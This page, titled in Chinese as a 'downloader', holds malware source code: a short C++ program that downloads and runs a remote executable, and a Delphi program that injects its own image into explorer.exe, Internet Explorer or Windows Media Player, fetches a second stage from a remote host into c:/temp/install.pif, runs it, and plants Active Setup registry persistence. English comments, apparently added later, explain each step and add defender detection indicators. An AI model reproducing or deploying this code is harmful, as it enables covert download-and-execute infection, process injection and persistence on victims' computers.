下载者


 //下面是经我简化的小程序(在windowsXP,C++6.0下调试通过)
#include<windows.h>
#include<urlmon.h>
#include<process.h>
#include<Shellapi.h>  //这个头文件里有ShellExecute的定义
#pragma comment (lib,"Urlmon.lib")

int main()
{
        // Downloader: fetch a remote executable to a fixed local path, then run it.
        // URLDownloadToFile writes the payload to C:/My.exe; its result is not
        // examined before the launch that follows.
        URLDownloadToFile(NULL,"http://127.0.0.1/mfc.exe","C:/My.exe",0,NULL);
        // ShellExecute "open" on the just-written file starts it with a visible
        // window (SW_SHOW). Defender note: URLDownloadToFile immediately followed
        // by execution of the downloaded file is the classic downloader pattern;
        // the fixed URL/destination pair is the indicator to alert on.
        ShellExecute(0,"open","C:/My.exe",NULL,NULL,SW_SHOW);

        return 0;
}

 delphi版:


program InjectTheSelf;

// Non-default image base. Inject (below) copies this process image into the
// target process at the same address, so the base is presumably chosen to
// avoid colliding with modules already mapped there — inferred, not stated.
{$IMAGEBASE $13140000}

uses Windows;
var
// ShellExecuteA from shell32.dll, resolved at runtime in Download via
// GetProcAddress rather than imported statically, so the name does not appear
// in this image's import table (triage: look for the string in the .data/.rdata
// sections instead).
  ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
// URLDownloadToFileA from urlmon.dll, likewise resolved at runtime.
  Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
// Module handles for shell32.dll and urlmon.dll, filled in by Download.
hShell,hUrlmon: THandle;

// Helper for the iexplore.exe injection target: reads the Internet Explorer
// executable path from the App Paths registry key.
// Returns the registered path, or a %programfiles% fallback if the query fails.
// The key separators appear as '/' on this page; the Windows registry uses '\',
// so this is presumably rendering damage to the original source — verify.
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
  vType := REG_SZ;
  // Return value of RegOpenKeyEx is not checked; the key is opened with
  // KEY_ALL_ACCESS although only a read follows.
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
  dLength := SizeOf(iename);
  // The key's default (unnamed) value holds the executable path.
  if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
  Result := iename
  else
  Result := '%programfiles%/Internet Explorer/IEXPLORE.EXE';
  RegCloseKey(iekey);
end;
// Registry-write helper used by the main block to plant the Active Setup
// persistence entry: creates (or opens) subkey under key and stores
// name=value as a REG_EXPAND_SZ string.
// Returns True only when RegSetValueEx reports success; the RegCreateKey
// result is not examined.
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
  result := false;
  RegCreateKey(key,PChar(subkey),regkey);
  // REG_EXPAND_SZ so environment variables in value are expanded by the reader.
  if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
    result := true;
  RegCloseKey(regkey);
end;

// Helper for the Windows Media Player injection target: reads the wmplayer.exe
// path from the App Paths registry key. Same shape as GetIEAppPath.
// Returns the registered path, or a %programfiles% fallback if the query fails.
function GetwmAppPath:string;
var
wmkey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
  vType := REG_SZ;
  // Return value of RegOpenKeyEx is not checked (see GetIEAppPath).
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
  dLength := SizeOf(iename);
  // The key's default (unnamed) value holds the executable path.
  if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
  Result := iename
  else
  Result := '%programfiles%/Windows Media Player/wmplayer.EXE';
  RegCloseKey(wmkey);
end;

// Payload routine. Its address is what RunInject hands to Inject as the remote
// thread entry point, so this body executes inside the chosen host process
// (explorer.exe, iexplore.exe or wmplayer.exe), not in this program.
procedure Download;
begin
  // kernel32/user32 are present in every Win32 process already; these two
  // calls only bump reference counts.
  LoadLibrary('kernel32.dll');
  LoadLibrary('user32.dll');
  // Resolve the two APIs at runtime so neither name is in the static import table.
  hShell:=LoadLibrary('Shell32.dll');
  hUrlmon:=LoadLibrary('urlmon.dll');
  @ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
  @Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
  // Fetch the second stage from the hard-coded URL into c:/temp/install.pif
  // (.pif files are run like executables). Both the hostname and the
  // destination path are indicators for this sample. Because this runs inside
  // the injected host, the outbound connection is attributed to that host
  // process, presumably the reason for the injection.
  Downfile(nil,'http://remoteip.3322.org/c2c.exe','c:/temp/install.pif', 0, nil);
  // ShowCmd 5 = SW_SHOW.
  ShellRun(0,'open','c:/temp/install.pif',nil,nil,5);
  // ExitProcess here terminates the host process the thread was injected into,
  // so a successful run is visible as explorer/IE/wmplayer exiting unexpectedly.
  ExitProcess(0);
end;

// Copies this process's own image into ProcessHandle at the same base address
// and starts a thread there at EntryPoint. The whole image is injected, which
// is why EntryPoint can be an ordinary procedure of this program (Download).
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
  // Base address of this executable's own image (GetModuleHandle(nil)).
  Module := Pointer(GetModuleHandle(nil));
  // SizeOfImage from the PE optional header: DOS header -> e_lfanew, then skip
  // the PE signature (dword) and the file header.
  Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
  SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
  // Release whatever the target has mapped at this address, then reserve and
  // commit the same range there as read/write/execute. Neither result is checked.
  VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
  NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  // Copy the full image across.
  WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
  // Start EntryPoint in the target, passing Module as the thread parameter.
  // Defender note: VirtualAllocEx(PAGE_EXECUTE_READWRITE) + WriteProcessMemory
  // + CreateRemoteThread into another process is a high-signal sequence for
  // EDR/ETW-based detection, as is the resulting unbacked RWX region in the host.
  CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

// Chooses the host process for the injection and injects Download into it.
// InjType 0: explorer.exe (found via the taskbar window class Shell_TrayWnd);
// 3: Windows Media Player, started hidden and found via its WMPlayerApp window;
// any other value: Internet Explorer, started hidden and found via IEFrame.
procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;

begin
  if InjType=0 then // inject into explorer.exe
  begin
    // PID of the process owning the taskbar window, i.e. explorer.exe.
    GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
  end
   else
  if InjType=3 then // inject into Windows Media Player
  begin
    // Launch the player with a hidden window, wait briefly for it to create
    // its main window, then read its PID.
    winexec(PChar(GetwmAppPath),sw_hide);
    sleep(500);
    GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
    end
  else  // inject into iexplore.exe
  begin
    // Original alternative launcher, left commented out by the author:
    //CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
    winexec(PChar(GetIEAppPath),sw_hide);
    sleep(500);
    GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
  end;
  // Open the chosen host with full access. Defender note: a hidden-window
  // launch of IE/WMP followed within ~500 ms by OpenProcess(PROCESS_ALL_ACCESS)
  // on that child from the same parent is an anomalous sequence worth correlating.
  ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
  Inject(ProcessHandle, @Download);
  // Release the process handle
  CloseHandle(ProcessHandle);
end;
BEGIN
// Persistence through Active Setup: an HKLM Installed Components entry whose
// StubPath names the downloaded file. Windows runs StubPath once per user at
// logon whenever the HKLM component is missing from (or newer than) that
// user's HKCU copy, so it re-executes for every profile on the machine.
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE/Microsoft/Active Setup/Installed Components/{2bf41072-b2b1-21c1-b5c1-0305f4155515}','StubPath','c:/temp/install.pif');
// Deleting the HKCU copy makes Active Setup treat the component as not yet
// run for the current user, so the stub fires again at the next logon.
// Defender note: creation of a StubPath value under HKLM\...\Active Setup\
// Installed Components\{GUID} that points at a user-writable location such as
// c:\temp is a strong persistence indicator; the GUID here is this sample's own.
RegDeleteKey(HKEY_current_user,'SOFTWARE/Microsoft/Active Setup/Installed Components/{2bf41072-b2b1-21c1-b5c1-0305f4155515}');
// Host selection (author's comment, translated): 1 = iexplore.exe,
// 0 = explorer.exe, 3 = Windows Media Player.
RunInject(3);
 end.
